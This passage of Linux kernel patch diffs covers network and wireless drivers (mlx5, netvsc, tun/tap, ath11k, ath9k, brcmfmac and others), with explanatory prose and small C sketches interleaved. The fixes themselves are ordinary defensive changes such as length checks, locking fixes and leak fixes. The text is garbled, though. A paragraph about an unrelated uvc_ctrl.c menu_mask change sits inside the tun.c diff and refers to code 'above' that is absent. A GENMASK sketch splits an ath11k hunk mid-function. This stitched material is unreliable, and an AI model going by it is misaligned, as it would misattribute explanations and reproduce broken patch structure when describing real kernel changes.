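	printf("inl->data = %p\n", (void *)inl->data);
	return 0;
}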
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+index 5b05b884b5fb3..d7b2ee5de1158 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+@@ -603,7 +603,7 @@ static int mlx5_tracer_handle_string_trace(struct mlx5_fw_tracer *tracer,
+ 	} else {
+ 		cur_string = mlx5_tracer_message_get(tracer, tracer_event);
+ 		if (!cur_string) {
+-			pr_debug("%s Got string event for unknown string tdsm: %d\n",
++			pr_debug("%s Got string event for unknown string tmsn: %d\n",
+ 				 __func__, tracer_event->string_event.tmsn);
+ 			return -1;
+ 		}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+index 0eb50be175cc4..64d4e7125e9bb 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+@@ -219,7 +219,8 @@ static int alloc_4k(struct mlx5_core_dev *dev, u64 *addr, u32 function)
+ 
+ 	n = find_first_bit(&fp->bitmask, 8 * sizeof(fp->bitmask));
+ 	if (n >= MLX5_NUM_4K_IN_PAGE) {
+-		mlx5_core_warn(dev, "alloc 4k bug\n");
++		mlx5_core_warn(dev, "alloc 4k bug: fw page = 0x%llx, n = %u, bitmask: %lu, max num of 4K pages: %d\n",
++			       fp->addr, n, fp->bitmask,  MLX5_NUM_4K_IN_PAGE);
+ 		return -ENOENT;
+ 	}
+ 	clear_bit(n, &fp->bitmask);
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c b/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
+index 8e368318558ac..0a0e233f36ab0 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
+@@ -304,9 +304,9 @@ irqreturn_t lan966x_ptp_irq_handler(int irq, void *args)
+ 		if (WARN_ON(!skb_match))
+ 			continue;
+ 
+-		spin_lock(&lan966x->ptp_ts_id_lock);
++		spin_lock_irqsave(&lan966x->ptp_ts_id_lock, flags);
+ 		lan966x->ptp_skbs--;
+-		spin_unlock(&lan966x->ptp_ts_id_lock);
++		spin_unlock_irqrestore(&lan966x->ptp_ts_id_lock, flags);
+ 
+ 		/* Get the h/w timestamp */
+ 		lan966x_get_hwtimestamp(lan966x, &ts, delay);
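Taking the plain spin_lock() on a lock that is also acquired with interrupts disabled risks deadlock, so the lan966x handler switches to the irqsave variant, which saves and restores the interrupt state through flags. The canonical shape of the pattern, as a kernel-style fragment against the real spinlock API (not a standalone program):

#include <linux/spinlock.h>

static DEFINE_SPINLOCK(ts_id_lock);

static void update_counter(int *counter)
{
	unsigned long flags;

	/* Saves the current IRQ state, disables local interrupts, and
	 * takes the lock; the restore puts the IRQ state back exactly as
	 * it was. Safe whether the caller runs with IRQs on or off. */
	spin_lock_irqsave(&ts_id_lock, flags);
	(*counter)--;
	spin_unlock_irqrestore(&ts_id_lock, flags);
}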
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_main.c b/drivers/net/ethernet/qlogic/qede/qede_main.c
+index 953f304b8588c..89d64a5a4951a 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_main.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_main.c
+@@ -960,7 +960,6 @@ static int qede_alloc_fp_array(struct qede_dev *edev)
+ {
+ 	u8 fp_combined, fp_rx = edev->fp_num_rx;
+ 	struct qede_fastpath *fp;
+-	void *mem;
+ 	int i;
+ 
+ 	edev->fp_array = kcalloc(QEDE_QUEUE_CNT(edev),
+@@ -970,14 +969,15 @@ static int qede_alloc_fp_array(struct qede_dev *edev)
+ 		goto err;
+ 	}
+ 
+-	mem = krealloc(edev->coal_entry, QEDE_QUEUE_CNT(edev) *
+-		       sizeof(*edev->coal_entry), GFP_KERNEL);
+-	if (!mem) {
+-		DP_ERR(edev, "coalesce entry allocation failed\n");
+-		kfree(edev->coal_entry);
+-		goto err;
++	if (!edev->coal_entry) {
++		edev->coal_entry = kcalloc(QEDE_MAX_RSS_CNT(edev),
++					   sizeof(*edev->coal_entry),
++					   GFP_KERNEL);
++		if (!edev->coal_entry) {
++			DP_ERR(edev, "coalesce entry allocation failed\n");
++			goto err;
++		}
+ 	}
+-	edev->coal_entry = mem;
+ 
+ 	fp_combined = QEDE_QUEUE_CNT(edev) - fp_rx - edev->fp_num_tx;
+ 
+diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c
+index 79f4e13620a46..da737d959e81c 100644
+--- a/drivers/net/hyperv/netvsc.c
++++ b/drivers/net/hyperv/netvsc.c
+@@ -851,6 +851,7 @@ static void netvsc_send_completion(struct net_device *ndev,
+ 	u32 msglen = hv_pkt_datalen(desc);
+ 	struct nvsp_message *pkt_rqst;
+ 	u64 cmd_rqst;
++	u32 status;
+ 
+ 	/* First check if this is a VMBUS completion without data payload */
+ 	if (!msglen) {
+@@ -922,6 +923,23 @@ static void netvsc_send_completion(struct net_device *ndev,
+ 		break;
+ 
+ 	case NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE:
++		if (msglen < sizeof(struct nvsp_message_header) +
++		    sizeof(struct nvsp_1_message_send_rndis_packet_complete)) {
++			if (net_ratelimit())
++				netdev_err(ndev, "nvsp_rndis_pkt_complete length too small: %u\n",
++					   msglen);
++			return;
++		}
++
++		/* If status indicates an error, output a message so we know
++		 * there's a problem. But process the completion anyway so the
++		 * resources are released.
++		 */
++		status = nvsp_packet->msg.v1_msg.send_rndis_pkt_complete.status;
++		if (status != NVSP_STAT_SUCCESS && net_ratelimit())
++			netdev_err(ndev, "nvsp_rndis_pkt_complete error status: %x\n",
++				   status);
++
+ 		netvsc_send_tx_complete(ndev, net_device, incoming_channel,
+ 					desc, budget);
+ 		break;
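The added netvsc check follows the rule the function already applies to other completion types: never dereference a payload field before proving the packet is long enough to contain it. A minimal sketch of the guard (the message layout is illustrative):

#include <stdio.h>
#include <stdint.h>
#include <string.h>

struct msg_header  { uint32_t type; };
struct msg_payload { uint32_t status; };

/* Returns the status, or -1 if the buffer is too short to hold the
 * header plus this payload: check the length *before* reading fields. */
static int parse_completion(const uint8_t *buf, size_t len)
{
	struct msg_payload pl;

	if (len < sizeof(struct msg_header) + sizeof(struct msg_payload))
		return -1;	/* truncated: reject instead of over-reading */

	memcpy(&pl, buf + sizeof(struct msg_header), sizeof(pl));
	return (int)pl.status;
}

int main(void)
{
	uint8_t short_buf[4] = { 0 };

	printf("%d\n", parse_completion(short_buf, sizeof(short_buf)));
	return 0;
}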
+diff --git a/drivers/net/ipa/gsi.c b/drivers/net/ipa/gsi.c
+index bea2da1c4c51d..f1a3938294866 100644
+--- a/drivers/net/ipa/gsi.c
++++ b/drivers/net/ipa/gsi.c
+@@ -1666,7 +1666,8 @@ static int gsi_generic_command(struct gsi *gsi, u32 channel_id,
+ 	val = u32_encode_bits(opcode, GENERIC_OPCODE_FMASK);
+ 	val |= u32_encode_bits(channel_id, GENERIC_CHID_FMASK);
+ 	val |= u32_encode_bits(GSI_EE_MODEM, GENERIC_EE_FMASK);
+-	val |= u32_encode_bits(params, GENERIC_PARAMS_FMASK);
++	if (gsi->version >= IPA_VERSION_4_11)
++		val |= u32_encode_bits(params, GENERIC_PARAMS_FMASK);
+ 
+ 	timeout = !gsi_command(gsi, GSI_GENERIC_CMD_OFFSET, val);
+ 
+diff --git a/drivers/net/ipa/gsi_reg.h b/drivers/net/ipa/gsi_reg.h
+index 3763359f208f7..e65f2f055cfff 100644
+--- a/drivers/net/ipa/gsi_reg.h
++++ b/drivers/net/ipa/gsi_reg.h
+@@ -372,7 +372,6 @@ enum gsi_general_id {
+ #define GSI_ERROR_LOG_OFFSET \
+ 			(0x0001f200 + 0x4000 * GSI_EE_AP)
+ 
+-/* Fields below are present for IPA v3.5.1 and above */
+ #define ERR_ARG3_FMASK			GENMASK(3, 0)
+ #define ERR_ARG2_FMASK			GENMASK(7, 4)
+ #define ERR_ARG1_FMASK			GENMASK(11, 8)
+diff --git a/drivers/net/tap.c b/drivers/net/tap.c
+index 9e75ed3f08ce5..760d8d1b6cba4 100644
+--- a/drivers/net/tap.c
++++ b/drivers/net/tap.c
+@@ -533,7 +533,7 @@ static int tap_open(struct inode *inode, struct file *file)
+ 	q->sock.state = SS_CONNECTED;
+ 	q->sock.file = file;
+ 	q->sock.ops = &tap_socket_ops;
+-	sock_init_data(&q->sock, &q->sk);
++	sock_init_data_uid(&q->sock, &q->sk, inode->i_uid);
+ 	q->sk.sk_write_space = tap_sock_write_space;
+ 	q->sk.sk_destruct = tap_sock_destruct;
+ 	q->flags = IFF_VNET_HDR | IFF_NO_PI | IFF_TAP;
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 24001112c3236..91d198aff2f9a 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
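The core of the uvc_ctrl.c change replaces the menu_count field with a menu_mask bitmask, so a mapping can expose a non-contiguous subset of menu entries. The minimum and maximum indices come from ffs()/fls() (find first/last set bit, 1-based, returning 0 for no bit), and test_bit() guards each individual index. A standalone sketch of the same arithmetic, using compiler builtins as stand-ins for the kernel helpers and assuming a 64-bit unsigned long:

#include <stdio.h>

/* Userspace stand-ins for the kernel's ffs()/fls(): 1-based bit indices,
 * 0 when no bit is set. */
static int my_ffs(unsigned long x) { return x ? __builtin_ctzl(x) + 1 : 0; }
static int my_fls(unsigned long x)
{
	return x ? 8 * (int)sizeof(unsigned long) - __builtin_clzl(x) : 0;
}

int main(void)
{
	/* Entries 1 and 2 valid, entry 0 masked out (e.g. a limited
	 * power-line-frequency menu that drops "Disabled"). */
	unsigned long menu_mask = 0x6;

	int min = my_ffs(menu_mask) - 1;	/* lowest valid index: 1 */
	int max = my_fls(menu_mask) - 1;	/* highest valid index: 2 */

	printf("minimum=%d maximum=%d\n", min, max);

	/* Iterate indices, skipping holes, like the __uvc_query_v4l2_ctrl
	 * loop above. */
	for (int i = 0; (1UL << i) <= menu_mask; i++) {
		if (!(menu_mask & (1UL << i)))
			continue;	/* masked-out entry */
		printf("index %d is selectable\n", i);
	}
	return 0;
}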
+@@ -3449,7 +3449,7 @@ static int tun_chr_open(struct inode *inode, struct file * file)
+ 	tfile->socket.file = file;
+ 	tfile->socket.ops = &tun_socket_ops;
+ 
+-	sock_init_data(&tfile->socket, &tfile->sk);
++	sock_init_data_uid(&tfile->socket, &tfile->sk, inode->i_uid);
+ 
+ 	tfile->sk.sk_write_space = tun_sock_write_space;
+ 	tfile->sk.sk_sndbuf = INT_MAX;
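In both the tap and tun hunks above, the socket is initialized with sock_init_data_uid(), passing the opening inode's i_uid. These drivers embed their struct socket in a private structure, so there is no backing socket inode from which the core could safely derive an owner; deriving it from the enclosing allocation amounts to type confusion. A toy sketch of the helper's shape (the _demo names are stand-ins, not kernel types):

#include <stdio.h>

typedef unsigned int kuid_demo_t;	/* stand-in for kuid_t */

struct sk_demo { kuid_demo_t uid; };

/* Shape of the new helper: the caller supplies the owning uid directly
 * instead of the core deriving it from the enclosing socket inode. */
static void init_data_uid(struct sk_demo *sk, kuid_demo_t uid)
{
	sk->uid = uid;
}

int main(void)
{
	struct sk_demo sk;

	/* tun/tap pass the uid of the inode being opened (the caller). */
	init_data_uid(&sk, 1000);
	printf("sk uid = %u\n", sk.uid);
	return 0;
}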
+diff --git a/drivers/net/wireless/ath/ath11k/core.h b/drivers/net/wireless/ath/ath11k/core.h
+index c20e84e031fad..bd06536f82a64 100644
+--- a/drivers/net/wireless/ath/ath11k/core.h
++++ b/drivers/net/wireless/ath/ath11k/core.h
+@@ -912,7 +912,6 @@ struct ath11k_base {
+ 	enum ath11k_dfs_region dfs_region;
+ #ifdef CONFIG_ATH11K_DEBUGFS
+ 	struct dentry *debugfs_soc;
+-	struct dentry *debugfs_ath11k;
+ #endif
+ 	struct ath11k_soc_dp_stats soc_stats;
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/debugfs.c b/drivers/net/wireless/ath/ath11k/debugfs.c
+index ccdf3d5ba1ab6..5bb6fd17fdf6f 100644
+--- a/drivers/net/wireless/ath/ath11k/debugfs.c
++++ b/drivers/net/wireless/ath/ath11k/debugfs.c
+@@ -976,10 +976,6 @@ int ath11k_debugfs_pdev_create(struct ath11k_base *ab)
+ 	if (test_bit(ATH11K_FLAG_REGISTERED, &ab->dev_flags))
+ 		return 0;
+ 
+-	ab->debugfs_soc = debugfs_create_dir(ab->hw_params.name, ab->debugfs_ath11k);
+-	if (IS_ERR(ab->debugfs_soc))
+-		return PTR_ERR(ab->debugfs_soc);
+-
+ 	debugfs_create_file("simulate_fw_crash", 0600, ab->debugfs_soc, ab,
+ 			    &fops_simulate_fw_crash);
+ 
+@@ -1001,15 +997,51 @@ void ath11k_debugfs_pdev_destroy(struct ath11k_base *ab)
+ 
+ int ath11k_debugfs_soc_create(struct ath11k_base *ab)
+ {
+-	ab->debugfs_ath11k = debugfs_create_dir("ath11k", NULL);
++	struct dentry *root;
++	bool dput_needed;
++	char name[64];
++	int ret;
++
++	root = debugfs_lookup("ath11k", NULL);
++	if (!root) {
++		root = debugfs_create_dir("ath11k", NULL);
++		if (IS_ERR_OR_NULL(root))
++			return PTR_ERR(root);
++
++		dput_needed = false;
++	} else {
++		/* a dentry from lookup() needs a dput() once we are done with it */
++		dput_needed = true;
++	}
++
++	scnprintf(name, sizeof(name), "%s-%s", ath11k_bus_str(ab->hif.bus),
++		  dev_name(ab->dev));
++
++	ab->debugfs_soc = debugfs_create_dir(name, root);
++	if (IS_ERR_OR_NULL(ab->debugfs_soc)) {
++		ret = PTR_ERR(ab->debugfs_soc);
++		goto out;
++	}
++
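For mappings coming from userspace, the legacy menu_count is converted to a contiguous mask with GENMASK(count - 1, 0). A one-file sketch of that identity, with the mask macro written out since the kernel version lives in <linux/bits.h>:

#include <stdio.h>

/* Same shape as the kernel's GENMASK(h, l) for unsigned long,
 * spelled out for a standalone build. */
#define GENMASK_UL(h, l) \
	(((~0UL) << (l)) & (~0UL >> (8 * sizeof(unsigned long) - 1 - (h))))

int main(void)
{
	unsigned int menu_count = 3;
	unsigned long mask = GENMASK_UL(menu_count - 1, 0);

	printf("count=%u -> mask=0x%lx\n", menu_count, mask); /* 0x7 */
	return 0;
}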
++	ret = 0;
+ 
+-	return PTR_ERR_OR_ZERO(ab->debugfs_ath11k);
++out:
++	if (dput_needed)
++		dput(root);
++
++	return ret;
+ }
+ 
+ void ath11k_debugfs_soc_destroy(struct ath11k_base *ab)
+ {
+-	debugfs_remove_recursive(ab->debugfs_ath11k);
+-	ab->debugfs_ath11k = NULL;
++	debugfs_remove_recursive(ab->debugfs_soc);
++	ab->debugfs_soc = NULL;
++
++	/* We deliberately do not remove the ath11k directory, even if it
++	 * ends up empty. This simplifies the directory handling, and an
++	 * empty ath11k directory left behind in debugfs is only a minor
++	 * cosmetic issue.
++	 */
+ }
+ EXPORT_SYMBOL(ath11k_debugfs_soc_destroy);
+ 
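The reworked ath11k scheme keeps a single shared "ath11k" directory and nests one per-device directory ("<bus>-<dev>") inside it, so multi-device systems no longer collide on the top-level name. The lookup-or-create-then-dput dance generalizes; a kernel-style helper sketch against the real debugfs API (a fragment, not a standalone program):

#include <linux/debugfs.h>

/* Return (creating if needed) a shared top-level debugfs directory.
 * debugfs_lookup() grabs a reference that must be dropped with dput();
 * a dentry from debugfs_create_dir() must not be dput() by the caller. */
static struct dentry *get_or_create_root(const char *name, bool *dput_needed)
{
	struct dentry *root = debugfs_lookup(name, NULL);

	if (root) {
		*dput_needed = true;	/* reference came from lookup */
		return root;
	}

	*dput_needed = false;		/* create does not add a reference */
	return debugfs_create_dir(name, NULL);
}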
+diff --git a/drivers/net/wireless/ath/ath11k/dp_rx.c b/drivers/net/wireless/ath/ath11k/dp_rx.c
+index c5a4c34d77499..e964e1b722871 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_rx.c
++++ b/drivers/net/wireless/ath/ath11k/dp_rx.c
+@@ -3126,6 +3126,7 @@ int ath11k_peer_rx_frag_setup(struct ath11k *ar, const u8 *peer_mac, int vdev_id
+ 	if (!peer) {
+ 		ath11k_warn(ab, "failed to find the peer to set up fragment info\n");
+ 		spin_unlock_bh(&ab->base_lock);
++		crypto_free_shash(tfm);
+ 		return -ENOENT;
+ 	}
+ 
+@@ -5022,6 +5023,7 @@ static int ath11k_dp_rx_mon_deliver(struct ath11k *ar, u32 mac_id,
+ 		} else {
+ 			rxs->flag |= RX_FLAG_ALLOW_SAME_PN;
+ 		}
++		rxs->flag |= RX_FLAG_ONLY_MONITOR;
+ 		ath11k_update_radiotap(ar, ppduinfo, mon_skb, rxs);
+ 
+ 		ath11k_dp_rx_deliver_msdu(ar, napi, mon_skb, rxs);
+diff --git a/drivers/net/wireless/ath/ath11k/pci.c b/drivers/net/wireless/ath/ath11k/pci.c
+index 99cf3357c66e1..3c6005ab9a717 100644
+--- a/drivers/net/wireless/ath/ath11k/pci.c
++++ b/drivers/net/wireless/ath/ath11k/pci.c
+@@ -979,7 +979,7 @@ static __maybe_unused int ath11k_pci_pm_suspend(struct device *dev)
+ 	if (ret)
+ 		ath11k_warn(ab, "failed to suspend core: %d\n", ret);
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static __maybe_unused int ath11k_pci_pm_resume(struct device *dev)
+diff --git a/drivers/net/wireless/ath/ath9k/hif_usb.c b/drivers/net/wireless/ath/ath9k/hif_usb.c
+index 1a2e0c7eeb023..f521dfa2f1945 100644
+--- a/drivers/net/wireless/ath/ath9k/hif_usb.c
++++ b/drivers/net/wireless/ath/ath9k/hif_usb.c
+@@ -561,11 +561,11 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 			memcpy(ptr, skb->data, rx_remain_len);
+ 
+ 			rx_pkt_len += rx_remain_len;
+-			hif_dev->rx_remain_len = 0;
+ 			skb_put(remain_skb, rx_pkt_len);
+ 
+ 			skb_pool[pool_index++] = remain_skb;
+-
++			hif_dev->remain_skb = NULL;
++			hif_dev->rx_remain_len = 0;
+ 		} else {
+ 			index = rx_remain_len;
+ 		}
+@@ -584,16 +584,21 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 		pkt_len = get_unaligned_le16(ptr + index);
+ 		pkt_tag = get_unaligned_le16(ptr + index + 2);
+ 
++		/* If we hit an invalid pkt_tag or pkt_len, the whole input
++		 * SKB is considered invalid and dropped; the associated
++		 * packets already gathered in skb_pool are dropped, too.
++		 */
+ 		if (pkt_tag != ATH_USB_RX_STREAM_MODE_TAG) {
+ 			RX_STAT_INC(hif_dev, skb_dropped);
+-			return;
++			goto invalid_pkt;
+ 		}
+ 
+ 		if (pkt_len > 2 * MAX_RX_BUF_SIZE) {
+ 			dev_err(&hif_dev->udev->dev,
+ 				"ath9k_htc: invalid pkt_len (%x)\n", pkt_len);
+ 			RX_STAT_INC(hif_dev, skb_dropped);
+-			return;
++			goto invalid_pkt;
+ 		}
+ 
+ 		pad_len = 4 - (pkt_len & 0x3);
+@@ -605,11 +610,6 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 
+ 		if (index > MAX_RX_BUF_SIZE) {
+ 			spin_lock(&hif_dev->rx_lock);
+-			hif_dev->rx_remain_len = index - MAX_RX_BUF_SIZE;
+-			hif_dev->rx_transfer_len =
+-				MAX_RX_BUF_SIZE - chk_idx - 4;
+-			hif_dev->rx_pad_len = pad_len;
+-
+ 			nskb = __dev_alloc_skb(pkt_len + 32, GFP_ATOMIC);
+ 			if (!nskb) {
+ 				dev_err(&hif_dev->udev->dev,
+@@ -617,6 +617,12 @@ static void ath9k_hif_usb_rx_stream(struct hif_device_usb *hif_dev,
+ 				spin_unlock(&hif_dev->rx_lock);
+ 				goto err;
+ 			}
++
++			hif_dev->rx_remain_len = index - MAX_RX_BUF_SIZE;
++			hif_dev->rx_transfer_len =
++				MAX_RX_BUF_SIZE - chk_idx - 4;
++			hif_dev->rx_pad_len = pad_len;
++
+ 			skb_reserve(nskb, 32);
+ 			RX_STAT_INC(hif_dev, skb_allocated);
+ 
+@@ -654,6 +660,13 @@ err:
+ 				 skb_pool[i]->len, USB_WLAN_RX_PIPE);
+ 		RX_STAT_INC(hif_dev, skb_completed);
+ 	}
++	return;
++invalid_pkt:
++	for (i = 0; i < pool_index; i++) {
++		dev_kfree_skb_any(skb_pool[i]);
++		RX_STAT_INC(hif_dev, skb_dropped);
++	}
++	return;
+ }
+ 
+ static void ath9k_hif_usb_rx_cb(struct urb *urb)
+@@ -1411,8 +1424,6 @@ static void ath9k_hif_usb_disconnect(struct usb_interface *interface)
+ 
+ 	if (hif_dev->flags & HIF_USB_READY) {
+ 		ath9k_htc_hw_deinit(hif_dev->htc_handle, unplugged);
+-		ath9k_hif_usb_dev_deinit(hif_dev);
+-		ath9k_destroy_wmi(hif_dev->htc_handle->drv_priv);
+ 		ath9k_htc_hw_free(hif_dev->htc_handle);
+ 	}
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_init.c b/drivers/net/wireless/ath/ath9k/htc_drv_init.c
+index 07ac88fb1c577..96a3185a96d75 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_init.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_init.c
+@@ -988,6 +988,8 @@ void ath9k_htc_disconnect_device(struct htc_target *htc_handle, bool hotunplug)
+ 
+ 		ath9k_deinit_device(htc_handle->drv_priv);
+ 		ath9k_stop_wmi(htc_handle->drv_priv);
++		ath9k_hif_usb_dealloc_urbs((struct hif_device_usb *)htc_handle->hif_dev);
++		ath9k_destroy_wmi(htc_handle->drv_priv);
+ 		ieee80211_free_hw(htc_handle->drv_priv->hw);
+ 	}
+ }
+diff --git a/drivers/net/wireless/ath/ath9k/htc_hst.c b/drivers/net/wireless/ath/ath9k/htc_hst.c
+index ca05b07a45e67..fe62ff668f757 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_hst.c
++++ b/drivers/net/wireless/ath/ath9k/htc_hst.c
+@@ -391,7 +391,7 @@ static void ath9k_htc_fw_panic_report(struct htc_target *htc_handle,
+  * HTC Messages are handled directly here and the obtained SKB
+  * is freed.
+  *
+- * Service messages (Data, WMI) passed to the corresponding
++ * Service messages (Data, WMI) are passed to the corresponding
+  * endpoint RX handlers, which have to free the SKB.
+  */
+ void ath9k_htc_rx_msg(struct htc_target *htc_handle,
+@@ -478,6 +478,8 @@ invalid:
+ 		if (endpoint->ep_callbacks.rx)
+ 			endpoint->ep_callbacks.rx(endpoint->ep_callbacks.priv,
+ 						  skb, epid);
++		else
++			goto invalid;
+ 	}
+ }
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/wmi.c b/drivers/net/wireless/ath/ath9k/wmi.c
+index f315c54bd3ac0..19345b8f7bfd5 100644
+--- a/drivers/net/wireless/ath/ath9k/wmi.c
++++ b/drivers/net/wireless/ath/ath9k/wmi.c
+@@ -341,6 +341,7 @@ int ath9k_wmi_cmd(struct wmi *wmi, enum wmi_cmd_id cmd_id,
+ 	if (!time_left) {
+ 		ath_dbg(common, WMI, "Timeout waiting for WMI command: %s\n",
+ 			wmi_cmd_to_name(cmd_id));
++		wmi->last_seq_id = 0;
+ 		mutex_unlock(&wmi->op_mutex);
+ 		return -ETIMEDOUT;
+ 	}
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
+index 22344e68fd597..fc5232a896535 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
+@@ -298,6 +298,7 @@ int brcmf_c_preinit_dcmds(struct brcmf_if *ifp)
+ 			 err);
+ 		goto done;
+ 	}
++	buf[sizeof(buf) - 1] = '\0';
+ 	ptr = (char *)buf;
+ 	strsep(&ptr, "\n");
+ 
+@@ -318,15 +319,17 @@ int brcmf_c_preinit_dcmds(struct brcmf_if *ifp)
+ 	if (err) {
+ 		brcmf_dbg(TRACE, "retrieving clmver failed, %d\n", err);
+ 	} else {
++		buf[sizeof(buf) - 1] = '\0';
+ 		clmver = (char *)buf;
+-		/* store CLM version for adding it to revinfo debugfs file */
+-		memcpy(ifp->drvr->clmver, clmver, sizeof(ifp->drvr->clmver));
+ 
+ 		/* Replace all newline/linefeed characters with space
+ 		 * character
+ 		 */
+ 		strreplace(clmver, '\n', ' ');
+ 
++		/* store CLM version for adding it to revinfo debugfs file */
++		memcpy(ifp->drvr->clmver, clmver, sizeof(ifp->drvr->clmver));
++
+ 		brcmf_dbg(INFO, "CLM version = %s\n", clmver);
+ 	}
+ 
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c
+index 595ae3ae561ef..175272c2694d7 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/core.c
+@@ -335,6 +335,7 @@ static netdev_tx_t brcmf_netdev_start_xmit(struct sk_buff *skb,
+ 			bphy_err(drvr, "%s: failed to expand headroom\n",
+ 				 brcmf_ifname(ifp));
+ 			atomic_inc(&drvr->bus_if->stats.pktcow_failed);
++			dev_kfree_skb(skb);
+ 			goto done;
+ 		}
+ 	}
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c
+index cec53f934940a..45fbcbdc7d9e4 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/msgbuf.c
+@@ -347,8 +347,11 @@ brcmf_msgbuf_alloc_pktid(struct device *dev,
+ 		count++;
+ 	} while (count < pktids->array_size);
+ 
+-	if (count == pktids->array_size)
++	if (count == pktids->array_size) {
++		dma_unmap_single(dev, *physaddr, skb->len - data_offset,
++				 pktids->direction);
+ 		return -ENOMEM;
++	}
+ 
+ 	array[*idx].data_offset = data_offset;
+ 	array[*idx].physaddr = *physaddr;
+diff --git a/drivers/net/wireless/intel/ipw2x00/ipw2200.c b/drivers/net/wireless/intel/ipw2x00/ipw2200.c
+index 5b483de18c81f..9dfa34a740dc9 100644
+--- a/drivers/net/wireless/intel/ipw2x00/ipw2200.c
++++ b/drivers/net/wireless/intel/ipw2x00/ipw2200.c
+@@ -3441,7 +3441,7 @@ static void ipw_rx_queue_reset(struct ipw_priv *priv,
+ 			dma_unmap_single(&priv->pci_dev->dev,
+ 					 rxq->pool[i].dma_addr,
+ 					 IPW_RX_BUF_SIZE, DMA_FROM_DEVICE);
+-			dev_kfree_skb(rxq->pool[i].skb);
++			dev_kfree_skb_irq(rxq->pool[i].skb);
+ 			rxq->pool[i].skb = NULL;
+ 		}
+ 		list_add_tail(&rxq->pool[i].list, &rxq->rx_used);
+@@ -11397,9 +11397,14 @@ static int ipw_wdev_init(struct net_device *dev)
+ 	set_wiphy_dev(wdev->wiphy, &priv->pci_dev->dev);
+ 
+ 	/* With that information in place, we can now register the wiphy... */
+-	if (wiphy_register(wdev->wiphy))
+-		rc = -EIO;
++	rc = wiphy_register(wdev->wiphy);
++	if (rc)
++		goto out;
++
++	return 0;
+ out:
++	kfree(priv->ieee->a_band.channels);
++	kfree(priv->ieee->bg_band.channels);
+ 	return rc;
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlegacy/3945-mac.c b/drivers/net/wireless/intel/iwlegacy/3945-mac.c
+index 7352d5b2095f4..9054a910ca357 100644
+--- a/drivers/net/wireless/intel/iwlegacy/3945-mac.c
++++ b/drivers/net/wireless/intel/iwlegacy/3945-mac.c
+@@ -3378,10 +3378,12 @@ static DEVICE_ATTR(dump_errors, 0200, NULL, il3945_dump_error_log);
+  *
+  *****************************************************************************/
+ 
+-static void
++static int
+ il3945_setup_deferred_work(struct il_priv *il)
+ {
+ 	il->workqueue = create_singlethread_workqueue(DRV_NAME);
++	if (!il->workqueue)
++		return -ENOMEM;
+ 
+ 	init_waitqueue_head(&il->wait_command_queue);
+ 
+@@ -3398,6 +3400,8 @@ il3945_setup_deferred_work(struct il_priv *il)
+ 	timer_setup(&il->watchdog, il_bg_watchdog, 0);
+ 
+ 	tasklet_setup(&il->irq_tasklet, il3945_irq_tasklet);
++
++	return 0;
+ }
+ 
+ static void
+@@ -3717,7 +3721,10 @@ il3945_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	}
+ 
+ 	il_set_rxon_channel(il, &il->bands[NL80211_BAND_2GHZ].channels[5]);
+-	il3945_setup_deferred_work(il);
++	err = il3945_setup_deferred_work(il);
++	if (err)
++		goto out_remove_sysfs;
++
+ 	il3945_setup_handlers(il);
+ 	il_power_initialize(il);
+ 
+@@ -3729,7 +3736,7 @@ il3945_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	err = il3945_setup_mac(il);
+ 	if (err)
+-		goto out_remove_sysfs;
++		goto out_destroy_workqueue;
+ 
+ 	il_dbgfs_register(il, DRV_NAME);
+ 
+@@ -3738,9 +3745,10 @@ il3945_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	return 0;
+ 
+-out_remove_sysfs:
++out_destroy_workqueue:
+ 	destroy_workqueue(il->workqueue);
